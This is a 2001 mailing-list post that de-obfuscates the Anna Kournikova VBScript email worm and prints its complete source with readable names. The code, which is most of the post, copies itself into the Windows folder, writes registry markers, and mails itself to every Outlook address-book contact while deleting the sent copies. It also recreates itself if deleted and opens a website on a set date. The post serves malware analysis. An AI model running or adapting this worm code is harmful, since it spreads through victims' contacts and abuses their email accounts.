Vulnerability Development mailing list archives

unobfuscation of AnnaKournikova.jpg. vee bee ess worm

From: rpc <h () ckz org>
Date: Mon, 12 Feb 2001 14:42:03 GMT

Hi All,

I've heard of several reports of this trojan popping up, but I haven't found
much information on it, so I decided to unobfuscate the source and have a look
at it.

Below is the payload of the worm. Obfuscated variable names have been
translated into more meaningful names.

-----Begin AnnaKournikova.jpg. v & b & s ---------------

'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set shellobject = CreateObject("WScript.Shell")
shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set filesystem= Createobject("scripting.filesystemobject")
filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"
if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
mail_trojan()
end if
if month(now) =1 and day(now) =26 then
shellobject.run "Http://www.dynabyte.nl",3,false
end if
Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)
payload= wormfile.readall
wormfile.Close
Do
If Not (filesystem.fileexists(wscript.scriptfullname)) Then
Set newfile= filesystem.createtextfile(wscript.scriptfullname, True)
newfile.writepayload
newfile.Close
End If
Loop
Function mail_trojan()
On Error Resume Next
Set outlook = CreateObject("Outlook.Application")
If outlook= "Outlook"Then
Set mapi=outlook.GetNameSpace("MAPI")
Set addresses= mapi.AddressLists
For Each address In addresses
If address.AddressEntries.Count <> 0 Then
count = address.AddressEntries.Count
For I= 1 To count
Set email = outlook.CreateItem(0)
Set entry = address.AddressEntries(I)
email.To = entry.Address
email.Subject = "Here you have, ;o)"
email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachment=email.Attachments
attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
email.DeleteAfterSubmit = True
If email.To <> "" Then
email.Send
shellobject.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
----------------------------------------------

hasta,
--rpc

Current thread:

unobfuscation of AnnaKournikova.jpg. vee bee ess worm rpc (Feb 13)
- Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Ryan Yagatich (Feb 13)
- Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Vladimir Dubrovin (Feb 13)
  - Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Dzzie Z (Feb 19)